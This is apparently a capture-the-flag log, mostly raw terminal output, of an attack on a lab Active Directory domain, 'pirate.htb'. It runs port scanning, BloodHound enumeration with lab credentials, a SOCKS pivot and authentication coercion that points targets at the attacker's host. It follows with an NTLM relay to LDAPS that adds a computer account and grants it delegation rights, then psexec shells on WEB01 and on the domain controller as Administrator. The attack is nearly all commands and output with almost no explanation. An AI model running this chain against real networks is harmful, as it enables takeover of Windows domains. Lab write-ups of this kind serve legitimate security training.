┌──(root㉿kaada)-[/home/kali/Desktop] └─# ./rustscan -a 10.129.244.95 .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }//\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- With RustScan, I scan ports so fast, even my firewall gets whiplash 💨
[~] The config file is expected to be at "/root/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with--ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 10.129.244.95:53 Open 10.129.244.95:88 Open 10.129.244.95:80 Open 10.129.244.95:135 Open 10.129.244.95:139 Open 10.129.244.95:389 Open 10.129.244.95:445 Open 10.129.244.95:464 Open 10.129.244.95:593 Open 10.129.244.95:636 Open 10.129.244.95:2179 Open 10.129.244.95:3268 Open 10.129.244.95:3269 Open 10.129.244.95:5985 Open 10.129.244.95:9389 Open 10.129.244.95:49666 Open 10.129.244.95:49685 Open 10.129.244.95:49688 Open 10.129.244.95:49689 Open 10.129.244.95:49686 Open 10.129.244.95:49913 Open 10.129.244.95:49934 [~] Starting Script(s) [~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-1507:52-0400 Initiating Ping Scan at 07:52 Scanning 10.129.244.95 [4 ports] Completed Ping Scan at 07:52, 0.20s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 07:52 Completed Parallel DNS resolution of 1 host. at 07:52, 0.50s elapsed DNS resolution of 1 IPs took 0.50s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 07:52 Scanning 10.129.244.95 [22 ports] Discovered open port 445/tcp on 10.129.244.95 Discovered open port 53/tcp on 10.129.244.95 Discovered open port 139/tcp on 10.129.244.95 Discovered open port 49686/tcp on 10.129.244.95 Discovered open port 135/tcp on 10.129.244.95 Discovered open port 49688/tcp on 10.129.244.95 Discovered open port 49685/tcp on 10.129.244.95 Discovered open port 389/tcp on 10.129.244.95 Discovered open port 5985/tcp on 10.129.244.95 Discovered open port 80/tcp on 10.129.244.95 Discovered open port 3269/tcp on 10.129.244.95 Discovered open port 49913/tcp on 10.129.244.95 Discovered open port 88/tcp on 10.129.244.95 Discovered open port 9389/tcp on 10.129.244.95 Discovered open port 49689/tcp on 10.129.244.95 Discovered open port 2179/tcp on 10.129.244.95 Discovered open port 464/tcp on 10.129.244.95 Discovered open port 3268/tcp on 10.129.244.95 Discovered open port 49666/tcp on 10.129.244.95 Discovered open port 49934/tcp on 10.129.244.95 Discovered open port 636/tcp on 10.129.244.95 Discovered open port 593/tcp on 10.129.244.95 Completed SYN Stealth Scan at 07:52, 0.23s elapsed (22 total ports) Nmap scan report for 10.129.244.95 Host is up, received echo-reply ttl 127 (0.096s latency). Scanned at 2026-03-1507:52:35 EDT for 0s
PORT STATE SERVICE REASON 53/tcp open domain syn-ack ttl 127 80/tcp open http syn-ack ttl 126 88/tcp open kerberos-sec syn-ack ttl 127 135/tcp open msrpc syn-ack ttl 127 139/tcp open netbios-ssn syn-ack ttl 127 389/tcp open ldap syn-ack ttl 127 445/tcp open microsoft-ds syn-ack ttl 127 464/tcp open kpasswd5 syn-ack ttl 127 593/tcp open http-rpc-epmap syn-ack ttl 127 636/tcp open ldapssl syn-ack ttl 127 2179/tcp open vmrdp syn-ack ttl 127 3268/tcp open globalcatLDAP syn-ack ttl 127 3269/tcp open globalcatLDAPssl syn-ack ttl 127 5985/tcp open wsman syn-ack ttl 127 9389/tcp open adws syn-ack ttl 127 49666/tcp open unknown syn-ack ttl 127 49685/tcp open unknown syn-ack ttl 127 49686/tcp open unknown syn-ack ttl 127 49688/tcp open unknown syn-ack ttl 127 49689/tcp open unknown syn-ack ttl 127 49913/tcp open unknown syn-ack ttl 127 49934/tcp open unknown syn-ack ttl 127
Read data files from:/usr/share/nmap Nmap done:1 IP address (1 host up) scanned in1.02 seconds Raw packets sent:26 (1.120KB) | Rcvd:24 (1.096KB)
┌──(root㉿kaada)-[/home/kali/Desktop] └─# bloodhound-python -c All -u 'pentest' -p 'p3nt3st2025!&' -ns 10.129.5.32 -d pirate.htb -dc DC01.pirate.htb --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) WARNING: Could not find a global catalog server, assuming the primary DC has this role If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (DC01.pirate.htb:88)] [Errno 113] No route to host INFO: Connecting to LDAP server: DC01.pirate.htb INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 4 computers INFO: Connecting to LDAP server: DC01.pirate.htb ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains ERROR: Could not find a Global Catalog in this domain! Resolving will be unreliable in forests with multiple domains INFO: Found 10 users INFO: Found 54 groups INFO: Found 2 gpos INFO: Found 1 ous INFO: Found 20 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: INFO: Querying computer: WEB01.pirate.htb INFO: Querying computer: INFO: Querying computer: DC01.pirate.htb WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out. WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out. WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out. WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out. WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out. INFO: Done in 00M 23S INFO: Compressing output into 20260315150937_bloodhound.zip
[*] Waiting for new connection... [*] Connection from node10.129.5.32:50886 is set up successfully! Nodeid is 0 (admin) >> use 0 (node0) >> socks 1080 [*] Trying to listen on 0.0.0.0:1080...... [*] Waiting for agent's response...... [*] Socks start successfully!
[info] Starting coerce mode [info] Scanning target 192.168.100.2 [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:135... OK [*] DCERPC portmapper discovered ports: 49664,49665,49668,49705,49706,49679,49685 [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:49679... OK [+] DCERPC port '49679' is accessible! [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:49679... OK [+] Successful bind to interface (12345678-1234-ABCD-EF00-0123456789AB, 1.0)! [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:49679... OK [>] (-testing-) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszL [!] (NO_AUTH_RECEIVED) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotification(pszLocalMachine='\\10.10.14.214\x00') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:49679... OK [>] (-testing-) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(ps [!] (RPC_S_INVALID_NET_ADDR) MS-RPRN──>RpcRemoteFindFirstPrinterChangeNotificationEx(pszLocalMachine='\\10.10.14.214\x00') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [+] SMB named pipe '\PIPE\eventlog' is accessible! [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [+] Successful bind to interface (82273fdc-e32a-18c3-3f78-827929dc23ea, 0.0)! [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [>] (-testing-) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\10.10.14.21 [!] (NO_AUTH_RECEIVED) MS-EVEN──>ElfrOpenBELW(BackupFileName='\??\UNC\10.10.14.214\6N9PO4W7\aa') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [+] SMB named pipe '\PIPE\lsarpc' is accessible! [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [+] Successful bind to interface (c681d488-d850-11d0-8c52-00c04fd90f7e, 1.0)! [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\bW [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\bWJ6zkPG\file.txt\x00') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\VC [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\VCtcSqNA\\x00') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\t5 [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214\t5oFllGy\x00') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214@80 [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFile(FileName='\\10.10.14.214@80/u27\share\file.txt\x00') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\ [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\JfHAvDy3\file.txt\x00') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\ [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\kJUTdRXY\\x00') [proxychains] Strict chain ... 127.0.0.1:1080... 192.168.100.2:445... OK [>] (-testing-) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\ [+] (ERROR_BAD_NETPATH) MS-EFSR──>EfsRpcAddUsersToFileEx(FileName='\\10.10.14.214\69F0exzP\x00')
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
[*] Servers started, waiting for connections [*] SMBD-Thread-5 (process_request_thread): Received connection from 10.129.244.95, attacking target ldaps://10.129.244.95 [*] Authenticating against ldaps://10.129.244.95 as PIRATE/WEB01$ SUCCEED [*] Enumerating relayed user's privileges. This may take a while on large domains [*] All targets processed! [*] SMBD-Thread-7 (process_request_thread): Connection from 10.129.244.95 controlled, but there are no more targets left! [*] All targets processed! [*] SMBD-Thread-8 (process_request_thread): Connection from 10.129.244.95 controlled, but there are no more targets left! [*] Attempting to create computer in: CN=Computers,DC=pirate,DC=htb [*] Adding new computer with username: QZQHPXWV$ and password: 3h/:0DYE,,w6:X, result: OK [*] Delegation rights modified succesfully! [*] QZQHPXWV$ can now impersonate users on WEB01$ via S4U2Proxy [*] All targets processed! [*] SMBD-Thread-9 (process_request_thread): Connection from 10.129.244.95 controlled, but there are no more targets left! [*] All targets processed! [*] SMBD-Thread-10 (process_request_thread): Connection from 10.129.244.95 controlled, but there are no more targets left! [*] All targets processed! [*] SMBD-Thread-11 (process_request_thread): Connecti
[proxychains] Strict chain ... 127.0.0.1:1080 ... WEB01.pirate.htb:445 ... OK [*] Requesting shares on WEB01.pirate.htb..... [*] Found writable share ADMIN$ [*] Uploading file fokFUnmH.exe [*] Opening SVCManager on WEB01.pirate.htb..... [*] Creating service uPIV on WEB01.pirate.htb..... [*] Starting service uPIV..... [proxychains] Strict chain ... 127.0.0.1:1080 ... WEB01.pirate.htb:445 ... OK [proxychains] Strict chain ... 127.0.0.1:1080 ... WEB01.pirate.htb:445 ... OK [!] Press help for extra shell commands [proxychains] Strict chain ... 127.0.0.1:1080 ... WEB01.pirate.htb:445 ... OK Microsoft Windows [Version 10.0.17763.8385] (c) 2018 Microsoft Corporation. All rights reserved.
(impacket-venv) ┌─[root@htb-tfqa3uuzek]─[/home/skyarrow/impacket-venv] └──╼ #psexec.py -k -no-pass Administrator@DC01.pirate.htb -target-ip 10.129.244.95 Impacket v0.14.0.dev0+20260320.93755.d400a6aa - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.244.95..... [*] Found writable share ADMIN$ [*] Uploading file hElrLNZu.exe [*] Opening SVCManager on 10.129.244.95..... [*] Creating service vBnl on 10.129.244.95..... [*] Starting service vBnl..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17763.8385] (c) 2018 Microsoft Corporation. All rights reserved.